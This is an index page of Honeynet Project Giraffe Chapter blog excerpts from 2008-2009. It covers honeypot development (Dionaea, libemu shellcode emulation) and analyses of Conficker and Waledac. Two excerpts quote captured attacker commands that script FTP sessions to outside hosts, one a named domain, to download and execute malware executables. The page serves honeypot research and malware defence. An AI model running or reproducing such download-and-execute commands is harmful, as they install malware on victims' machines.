Giraffe Chapter

RE-Google in action - screenshot

felix.leder — Sun, 15 Nov 2009 17:49:33 -0500

Giraffe Chapter

RE-Google - or how Grandma started Reverse Engineering

felix.leder — Sun, 15 Nov 2009 17:20:07 -0500

Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

Giraffe Chapter

Iteolih: RPC vulnerability implementation party

mark.schloesser — Tue, 25 Aug 2009 12:33:00 -0400

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Giraffe Chapter

Iteolih: Miles and More

markus.koetter — Tue, 11 Aug 2009 08:10:33 -0400

We got a new milestone due:

10.08.2009

thread-pool works
stream recording works
shellcode detection using libemu works
shellcode emulation using libemu works
compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.

To shorten things, basically all required points are hit with current svn.

So, given the time we just saved, some words about how it works.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: malicious ftp services

markus.koetter — Sun, 26 Jul 2009 09:28:13 -0400

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: If you can't touch it ...

markus.koetter — Tue, 21 Jul 2009 09:17:48 -0400

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.


cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: SMB/RPC efforts

mark.schloesser — Sat, 11 Jul 2009 11:23:49 -0400

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Giraffe Chapter

Conficker.A going down?

tillmann.werner — Fri, 10 Jul 2009 17:51:17 -0400

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.

Giraffe Chapter

nebula - Client library and revised signature segment selection

tillmann.werner — Mon, 8 Jun 2009 04:58:59 -0400

One project mentored by the Honeynet Project during GSoC aims at improving nebula, an automated intrusion signature generator. There are two critical components in the signature generator: A clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.

Giraffe Chapter

Iteolih: Is this worth your time?

markus.koetter — Fri, 5 Jun 2009 18:37:36 -0400

Hello,

due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.

I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: Python Benchmark

markus.koetter — Sun, 24 May 2009 12:57:02 -0400

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.

I tested

2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

Giraffe Chapter

A view on Conficker's inside

felix.leder — Fri, 24 Apr 2009 12:47:20 -0400

Many people have asked us, how Conficker looks like. That's a tough question for something that's hidden and tries to be as stealthy as possible. The last time somebody asked me: "Can you show me Conficker?", I decided to visualize Conficker. Here is a little video that shows the evil core of Conficker.C.

Giraffe Chapter

Speaking Waledac

felix.leder — Tue, 27 Jan 2009 16:33:50 -0500

While it seems to be impossible to say whether waledac is the successor of storm or not, what we can do is take a look at the traffic encryption. They guys over at Shadowserver have already blogged some details about this. We at the Giraffe Chapter investigated waledac's communication protocol further. Here are our results.

Giraffe Chapter

Giraffe Chapter - Status Report 2008

markus.koetter — Sat, 3 Jan 2009 22:22:38 -0500

ORGANIZATION
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:

Paul Bächer
Markus Kötter
Felix Leder
Mark Schlösser
Tillmann Werner
Georg Wicherski

DEPLOYMENTS

Giraffe Chapter

Waledac is wishing merry christmas

felix.leder — Fri, 2 Jan 2009 02:16:19 -0500

Waledac is wishing merry christmas

There is a new bot in town. It's called Waledac. The way it is spreading reminds a lot of people of the good old storm botnet: An email is sent containing a "christmas card" in form of the executable "postcard.exe".

[image:324 size=thumbnail]

A preliminary view on the binary has been given by the Shadowserver guys (Steve Adair).

I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down some of my few findings to let the hunt begin.

Giraffe Chapter

ipv6 local-link scope is a mess

markus.koetter — Mon, 20 Oct 2008 12:30:22 -0400

I've been looking on ipv6 lately, and even though I got a global /64 for free from he.net, I'm not that amused about ipv6 yet.

Giraffe Chapter

No more emulation!

tillmann.werner — Wed, 27 Aug 2008 16:05:09 -0400

Emulation is an important technology in honeypots and honeynets. It's not always what we want, though, and here's why. As you might know, most bots perform attacks in multiple stages, i.e., they

send some exploit code to the victim that opens a shell,
connect to that shell or let the shell connect back,
invoke commands to download the actual malware binary,
execute the malware.

Catching the exploit and providing a fake shell isn't too hard, as shown in this post. But we certainly don't want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.

Giraffe Chapter

About The Honeynet Project

drupal — Sun, 10 Aug 2008 20:54:48 -0400

Founded in 1999, The Honeynet Project is an international, non-profit (501c3) research organization dedicated to improving the security of the Internet at no cost to the public. With Chapters around the world, our volunteers are firmly committed to the ideals of OpenSource. Our goal, simply put, is to make a difference. We accomplish this goal in the following three ways.

Chicago Chapter